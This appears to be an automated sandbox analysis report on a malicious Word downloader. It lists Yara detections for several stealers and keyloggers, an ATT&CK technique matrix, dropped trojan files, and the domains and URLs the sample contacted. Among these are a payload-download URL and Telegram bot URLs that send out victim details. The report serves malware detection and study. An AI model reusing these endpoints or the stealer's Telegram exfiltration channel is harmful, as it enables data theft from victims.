Source: Yara match	File source: 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3463602515.000000002B8D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3457162026.000000002BFA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 4544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 3592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 6036, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 10.2.npratlsN.pif.2b489a06.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2e310000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2b48a8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb8a8ee.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2e490000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.242f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2e310ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214f9a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2e310000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2b489a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2ea90000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2b48a8ee.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2e310ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.npratlsN.pif.29aec7e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb89a06.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb89a06.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214f9a06.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.242f0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2ea90000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214fa8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb8a8ee.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2e490000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.npratlsN.pif.29aec7e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214fa8ee.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000E.00000002.3457231521.0000000021781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3457162026.000000002BE91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3463602515.000000002B801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 10.2.npratlsN.pif.2b489a06.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2e310000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2b48a8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb8a8ee.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2e490000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.242f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2e310ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214f9a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2e310000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2b489a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2ea90000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2b48a8ee.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2e310ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.npratlsN.pif.29aec7e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb89a06.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb89a06.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214f9a06.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.242f0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2ea90000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214fa8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb8a8ee.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2e490000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.npratlsN.pif.29aec7e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214fa8ee.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3457231521.000000002185C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 4544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 3592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 6036, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 10.2.npratlsN.pif.2b489a06.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2e310000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2b48a8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb8a8ee.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2e490000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.242f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2e310ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214f9a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2e310000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2b489a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2ea90000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2b48a8ee.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2e310ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.npratlsN.pif.29aec7e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb89a06.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.23cc0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb89a06.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2dd40ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214f9a06.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.242f0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2ea90000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.npratlsN.pif.2e490000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214fa8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.npratlsN.pif.2bb8a8ee.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.npratlsN.pif.29aec7e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.npratlsN.pif.214fa8ee.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3463602515.000000002B9EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3457231521.00000000218FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3463602515.000000002B8D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3457162026.000000002BFA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 4544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 3592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 6036, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	22 Scripting	1 Valid Accounts	1 Native API	22 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	1 DLL Side-Loading	1 Extra Window Memory Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 System Network Connections Discovery	Remote Desktop Protocol	1 Data from Local System	13 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	33 Exploitation for Client Execution	1 Valid Accounts	1 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	2 Software Packing	NTDS	36 System Information Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	311 Process Injection	1 Timestomp	LSA Secrets	1 Query Registry	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Cached Domain Credentials	241 Security Software Discovery	VNC	GUI Input Capture	234 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	41 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Extra Window Memory Injection	Proc Filesystem	2 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	221 Masquerading	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Valid Accounts	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Access Token Manipulation	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	41 Virtualization/Sandbox Evasion	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	311 Process Injection	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PI ITS15235.doc	60%	Virustotal		Browse
PI ITS15235.doc	58%	ReversingLabs	Document-Word.Downloader.DBatLoader
PI ITS15235.doc	100%	Avira	W97M/Agent.5915124
PI ITS15235.doc	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Windows \SysWOW64\NETUTILS.dll	100%	Joe Sandbox ML
C:\Users\Public\Libraries\Nsltarpn.PIF	100%	Joe Sandbox ML
C:\Windows\SysWOW64\brightness.exe	100%	Joe Sandbox ML
C:\Users\Public\Libraries\Nsltarpn.PIF	47%	ReversingLabs	Win32.Trojan.ModiLoader
C:\Users\Public\Libraries\npratlsN.pif	3%	ReversingLabs
C:\Windows \SysWOW64\NETUTILS.dll	29%	ReversingLabs	Win64.Trojan.Barys
C:\Windows \SysWOW64\svchost.pif	0%	ReversingLabs
C:\Windows\SysWOW64\brightness.exe	47%	ReversingLabs	Win32.Trojan.ModiLoader

Source	Detection	Scanner	Label
https://amazonenviro.com:443/admin/245_Nsltarpncon	0%	Avira URL Cloud	safe
https://amazonenviro.com/admin/245_Nsltarpncon6B	0%	Avira URL Cloud	safe
https://amazonenviro.com/admin/245_Nsltarpncon	0%	Avira URL Cloud	safe
https://amazonenviro.com/Z	0%	Avira URL Cloud	safe
http://e6.o.lencr.org0	0%	Avira URL Cloud	safe
https://amazonenviro.com/admin/245_Nslta	0%	Avira URL Cloud	safe
http://x1.i.	0%	Avira URL Cloud	safe
http://mail.irco.com.sa	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.16.1	true	false	high
amazonenviro.com	166.62.27.188	true	false	high
api.telegram.org	149.154.167.220	true	false	high
mail.irco.com.sa	46.151.208.21	true	true	unknown
checkip.dyndns.com	132.226.8.169	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://amazonenviro.com/admin/245_Nsltarpncon	true	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2014/01/2025%20/%2016:02:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20585948%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		high
https://reallyfreegeoip.org/xml/8.46.123.189	false		high
http://checkip.dyndns.org/	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2014/01/2025%20/%2016:21:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20585948%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2014/01/2025%20/%2014:32:10%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20585948%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	npratlsN.pif, 0000000A.00000002.3469573834.000000002C8AA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022AD8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022B0A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D1E7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D219000.00000004.00000800.00020000.00000000.sdmp	false		high
https://amazonenviro.com/admin/245_Nsltarpncon6B	brightness.exe, 00000004.00000002.1860229176.000000000063D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	npratlsN.pif, 0000000A.00000002.3469573834.000000002C8AA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022AD8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022B0A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D1E7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D219000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	npratlsN.pif, 0000000E.00000002.3457231521.000000002185C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BF7C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	brightness.exe, 00000004.00000002.1883329411.000000002064F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890760472.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000206A0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	brightness.exe, 00000004.00000002.1883329411.000000002064F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890760472.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000206A0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	npratlsN.pif, 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3463602515.000000002B8B8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.000000002185C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BF7C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	brightness.exe, 00000004.00000002.1883329411.000000002064F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890760472.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000206A0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.office.com/lB	npratlsN.pif, 0000000A.00000002.3463602515.000000002B9BC000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.0000000021968000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002C09F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://amazonenviro.com:443/admin/245_Nsltarpncon	brightness.exe, 00000004.00000002.1860229176.0000000000681000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
